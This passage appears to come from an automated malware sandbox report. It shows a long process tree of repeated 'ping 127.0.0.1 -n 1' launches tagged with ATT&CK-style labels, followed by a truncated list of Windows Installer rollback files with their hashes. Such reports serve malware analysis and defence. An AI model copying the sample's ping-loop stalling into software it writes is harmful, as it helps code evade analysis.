                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                PID:13368
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:13504
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:13700
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                    PID:4756
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:4732
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:4892
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                        PID:4084
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                        PID:13960
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:13980
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                          PID:13996
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                          PID:14024
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                          PID:14096
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:13876
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                            PID:14036
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:13660
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:14128
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                PID:14248
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:13832
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:14296
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                  PID:14184
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:14212
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                    PID:14308
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:14144
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6476
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                        PID:6600
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6444
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6668
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6712
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6776
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                PID:2056
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                PID:3772
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:768
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2216
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                    PID:6968
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7008
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:7048
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7128
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                          PID:2364
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                          PID:7236
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                          PID:7184
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                          PID:7320
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5484
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4472
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4036
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                PID:7588
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                PID:7660
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                PID:7432
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                PID:7524
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3996
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                  PID:7860
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                  PID:7944
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                  PID:8008
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                  PID:8092
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:8180
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:13924
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1096
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5096
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                          PID:8224
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8316
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1872
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:8464
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:8524
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8588
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:8680
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8752
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:8804
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                          PID:8880
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:9020
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                          PID:9108
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:9352
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:9596
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                            PID:9696
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:9744
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9760
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9884
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:540
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10008
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10076
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1664
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10148
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10304
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10336
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10420
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10540

                                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Config.Msi\e583da3.rbs

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                      6f37b4363cfaaa7dc877381c11e62087

                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                      20c4f168f78a8ce5ed9e3a6f03b47c813b65dbfd

                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                      d19a976d98e5780cd936dd83fc1c6d611ce6daef24e83be8a49dc5a9ad1e7c15

                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                      1c5d7fd41c29eed233352fd770efea61ed5afbabf5078c0d57f7662204d53a3cd9b133e695f9dee9160ea4da83b71b493668e294936c299c1e5bcc8bef2570f5

                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Config.Msi\e583da7.rbs

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                      c8b03e770ed51a4e79ff6557398803d1

                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                      8f73507195c34ec4e8e71d95d96057d26cbf517f

                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                      bf72a64820a37644d7de6bee596f7a4d63cc77def4b2a3b68f3156fd96bd4418

                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

